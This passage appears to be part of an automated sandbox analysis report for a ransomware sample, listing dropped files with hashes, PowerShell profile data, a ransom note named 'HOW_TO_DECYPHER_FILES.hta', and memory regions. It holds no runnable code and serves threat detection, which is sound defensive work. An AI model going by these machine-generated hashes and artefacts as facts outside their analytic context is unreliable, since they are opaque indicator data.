                                                                                                                                                              ee02ffe255608db99a5fc76d34b37e6a94f97c6c2a94cd95c37b679c1ad38c36

                                                                                                                                                              SHA512

                                                                                                                                                              f064f65c02f0f0191a0f8a34b8d4632522eb9cbb8a2a502ab7bbcef60d7b5d547c1f48146918e4884a4d62e60e366ec8baebbb7af7b2adba24c9824e5a658a10

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              d3028e10f80c101c17bd901389b79d14

                                                                                                                                                              SHA1

                                                                                                                                                              807e5374a748c291086959c8b4248747a1729765

                                                                                                                                                              SHA256

                                                                                                                                                              b335cede08c250f83768fa1abd3ac3657dbfe45ca4d24e0951dbb4907263f2b9

                                                                                                                                                              SHA512

                                                                                                                                                              a5534a178faa659f0224734f40b72c9a61902b0e86defe01fe66b778411b1679ac5049ad19ab2fdd38620bd4d5d2ad4327293e8bab98cbe81d1be13e2ac4a3a7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              fd8d4c05df7f8bc32ef2bbb17d9b0ce8

                                                                                                                                                              SHA1

                                                                                                                                                              6f04c5d00c76fb75bcb78ddf4a12b111ed0a8395

                                                                                                                                                              SHA256

                                                                                                                                                              0d3f228084548657d438b8e89cffe28e56839599f6784fde2da0a57410c9398f

                                                                                                                                                              SHA512

                                                                                                                                                              2c8e51856a0f07de9bf27eaa64c1238f88f60b18ca0f9ac2e9a4b6b981832d0a15361380db73a37f82ecc52c4835dca31cef97b6517becdc87c2318ecd5495eb

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              8ba07090ef991a8309470f6d2a026e90

                                                                                                                                                              SHA1

                                                                                                                                                              afb716b137acacc4f1c8194cf7959e464cd246b9

                                                                                                                                                              SHA256

                                                                                                                                                              7d8d0e6d684618cc4a037cad355c2a91c10398f950c862c7d6a2d2f4b14ffa1a

                                                                                                                                                              SHA512

                                                                                                                                                              f45e7ce8926c9defc9d578bdbd84a64dbad9633b1a26b17679e823e0ed5e67433dcb2f6be3bbe368fdf75e5dcbe66e28ee86c03df87a7d78fad4b74b862f267f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              04b930f42e6b6caced1fce218b6dce5b

                                                                                                                                                              SHA1

                                                                                                                                                              82bd8a60ff2d7ba0296b3761a4ed7b70257d61e9

                                                                                                                                                              SHA256

                                                                                                                                                              2d9bd2aa7db70c4300edbc1e6ddaf017a2a74d1c019d961e6fd93d761d5b0dee

                                                                                                                                                              SHA512

                                                                                                                                                              7a86a152a03af69436c4ce5b4154f7ab63d93d453d2e5f7e08c8748ae6ce16a22532ec84ffca5598ef0c9292d5de889998ace89f10423c1580d1a56acb296c29

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              07b43a689eaa44dbd251f686328919e9

                                                                                                                                                              SHA1

                                                                                                                                                              32e94f070a6f610f7b3dcd5fae406d5eb2052f38

                                                                                                                                                              SHA256

                                                                                                                                                              46939a1ba11772dc864c7344d21facd47ee7a5cba518a58f2062397b5b6e5ce9

                                                                                                                                                              SHA512

                                                                                                                                                              7d3563252f1101260f6b4ded3283b68346ba9533abf5f694740d742182dcd7a37a7fc9d9b0202bc7b7ea07a11de8640adab22a2766a167ac0a3e7a95436ac122

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              00cc339902576c27fe39df597c8d4cdb

                                                                                                                                                              SHA1

                                                                                                                                                              83320cc5573112891ea4b650b5985419259ab1f8

                                                                                                                                                              SHA256

                                                                                                                                                              da312f06e0863bffceee59b465ad8b9c8f0eebe39d28cff96c6d1530dc3ee188

                                                                                                                                                              SHA512

                                                                                                                                                              24d8e48ba7dc049147cab16afe89241e8b2f57d1f389e73d0c5979c692241201f49e39876c720bc490a9db81caa8c7e86e993c9c4ff84b3139b85a0fc8b490ce

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              95b870d284fbc90c47df814f0b1945ec

                                                                                                                                                              SHA1

                                                                                                                                                              317db99f583b9dbe5fdd237bd08a8ea4db71b638

                                                                                                                                                              SHA256

                                                                                                                                                              ade2f141c7440b7214796ae597250c1a1c515fa8ee5ee4a635663b488c381d5e

                                                                                                                                                              SHA512

                                                                                                                                                              ea0c24e58feb804fb0bad47b42fe77036de650d1da4bd6026216548c60ccba1955c4d18b44e57b58321e9529b88988d51b944d2cbebe2817d662472176b9e816

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_50hw2hye.st4.ps1

                                                                                                                                                              Filesize

                                                                                                                                                              1B

                                                                                                                                                              MD5

                                                                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                              SHA1

                                                                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                              SHA256

                                                                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                              SHA512

                                                                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                            • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              5be9644c7926750f7836c2692fc123a1

                                                                                                                                                              SHA1

                                                                                                                                                              35aa5aaa530b999391908070a3eb56a2604d5ff1

                                                                                                                                                              SHA256

                                                                                                                                                              4a9b937435068de52b3b14a03ceb11110d307b495d06c2c52b003916e4b2de25

                                                                                                                                                              SHA512

                                                                                                                                                              22b86147a140d2f441b1763ae2e185b3ccd6d6341cb267a36817a540113dc018205a719ec3e978caaf88d12f9554c79894702bfc1cad0acde3a1670324305024

                                                                                                                                                            • memory/2400-7-0x0000021545E10000-0x0000021545E32000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              136KB

                                                                                                                                                            • memory/2400-20-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2400-11-0x0000021545FC0000-0x0000021546036000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              472KB

                                                                                                                                                            • memory/2400-9-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2400-50-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2400-41-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2400-42-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4696-2-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4696-0-0x00007FFB5E433000-0x00007FFB5E434000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4696-557-0x00007FFB5E433000-0x00007FFB5E434000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4696-559-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4696-1-0x00000000000D0000-0x00000000000EC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/4696-647-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB